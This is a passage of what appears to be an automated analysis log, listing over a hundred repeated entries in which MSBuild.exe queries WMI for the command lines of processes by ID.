                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6024
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 784
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1816
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5584
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1176
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1272
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6160
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6008
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3420
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5484
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6864
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6432
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2552
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 824
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1252
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2544
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3404
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6596
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3832
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5984
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1724
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6412
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5116
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1652
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6404
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3816
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5108
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 364
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5104
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 792
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5100
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5960
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3804
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2508
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5092
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4660
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6380
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 776
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6808
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3788
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1200
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6816
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6192
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3768
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4196
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2900
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2036
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7032
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6764
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4604
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2012
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3304
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3732
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6748
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1572
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6312
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6304
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6360
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 696
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7072
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6248
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1984
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1552
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2064
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6716
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5416
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2396
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1532
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4544
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2388
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1956
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6696
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7124
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3528
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2380
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1948
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4960
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3664
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2800
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2368
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6288
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5812
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1932
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6672
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6840
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7100
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1496
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6372
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6216
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6232
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 628
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1488
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 356
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6648
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 620
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3636
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1476
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2336
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4920
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4488
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5348
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3620
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4048
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6452
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5336
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6628
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2748
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 592
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7056
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4468
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6224
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4032
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5756
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5288
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1432
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6988
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5308
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3152
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4444
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5736
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5304
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4872
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6164
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2284
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 988
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5296
